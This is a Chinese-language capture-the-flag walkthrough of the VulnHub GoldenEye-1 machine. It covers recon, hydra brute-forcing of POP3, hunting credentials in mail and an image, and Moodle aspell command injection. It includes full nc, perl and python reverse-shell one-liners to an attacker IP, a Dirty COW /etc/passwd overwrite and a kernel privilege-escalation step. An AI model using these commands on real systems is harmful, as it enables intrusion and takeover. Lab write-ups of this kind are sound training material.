https://www.vulnhub.com/entry/goldeneye-1,240/
首先我们使用arp-scan -l进行内网主机探测
使用nmap对靶机进行端口探测
打开web80端口提示我们需要进入/sev-home/这个目录下面进行登录
显然这是一个401验证
下面出现了一个编码的password,还有一个用户Boris
InvincibleHack3r
看样子是html编码,解码试试,得到结果InvincibleHack3r
我们用这个已知的用户进行登录,第一次大写的Boris登录失败,这里需要使用小写的boris,就能登录成功啦
这里有一个提示就是pop3服务器运行在一个非常高的端口上,
我们查看源代码的时候需要一直往下翻,找到两个用户分别是Natalya,Boris
将可能的用户加入到这个字典
开始爆破
hydra -L ./user.txt -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt -s 55007 10.10.10.134 pop3 -vV -t 10
爆破成功一个用户
我们使用nc连接目标地址(根据提示说pop3服务器在高端口),使用账号密码登录进去,有两封信
第二封信包含了一个账号密码还有让我们修改hosts
windows路径:C:\Windows\System32\drivers\etc\hosts
修改/etc/hosts后,这里就能得到一个cms
访问severnaya-station.com/gnocertdir地址:
继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆
用户名:xenia 密码:RCP90rulez!
Home / ▶ My profile / ▶ Messages —>发现有一封邮件,内容发现用户名doak
爆破用户名doak的邮件,获得用户名密码:doak/goat
echo doak > GodenEye.txt ---将用户名写入txt文本中
hydra -L GodenEye.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.134 -s 55007 pop3
登录doak用户查看邮件信息
邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
使用新的账户密码登录CMS
登录后在:Home / ▶ My home 右边发现: s3cret.txt 另外发现这是Moodle使用的2.2.3版本
现在我们查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。
查看这个图片
将图像下载到本地,使用strings进行分析,当然也可以使用exiftool图片分析工具
wget http://severnaya-station.com/dir007key/for-007.jpg
用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==
xWinter1995x!
使用获得的信息进行登录
用户名:GoldenEye
密码:xWinter1995x!
severnaya-station.com/gnocertdir
线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序,切换到admin用户登录即可成功
将代码替换到Path to aspell
ip改为攻击机ip,然后点击Save changes
接着在kali上监听1234端口,然后找到Home / ▶ My profile / ▶ Blogs / ▶ Add a new entry,点击下图3的位置反弹shell
提示了一个错误,说未发现拼写错误
那么多尝试几个反弹shell的命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.130 1234 >/tmp/f
perl -e 'use Socket;$i="10.10.10.130";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.130",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
直到使用python
使用FeatherScan
wget 10.10.10.130:8000/FeatherScan.sh
chmod +x FeatherScan.sh
./FeatherScan.sh
来看看有没有可以利用的suid文件
并且可能存在藏牛提权
那么我们尝试使用藏牛进行提权,使用openssl生成一个密码
然后将github下载下来的藏牛脚本移动到靶机上,并进行编译
我们检查一下这个系统有没有gcc和cc,是没有gcc的
我们可以使用cc命令,这里编译报错不用管,不影响脚本使用
随后写一个passwd标准用户,到一个临时passwd文件中,利用藏牛脚本进行提权,就没有任何回应了,可能添加成功了,但是需要重启靶机,而且再次点击那个ABC按钮进行反弹shell也不会成功,所以判断不了是否添加成功,那么就是失败
echo "xiaoyu:$1$abc$mJPQCTATLDV5aNzcHMYLr/:0:0::/root:/bin/bash" > /tmp/passwd
./exp1 /etc/passwd "$(cat /tmp/passwd)"
重启靶机重新反弹shell,再看看有没有内核漏洞
使用FeatherScan.sh查看完整的系统信息
searchsploit ubuntu 3.13 14.04 Privilege
看到一个合适的,直接复制下来
检查一下有没有用到gcc的,因为靶机不能用gcc
然后我们需要修改这个gcc为cc命令
然后从kali中下载这个exp,编译并执行,报错没关系,提权还是能正常提权的
全网低价证书找我 + baibaixiaoyu2024
包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,oscp,osep等等
往期推荐
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容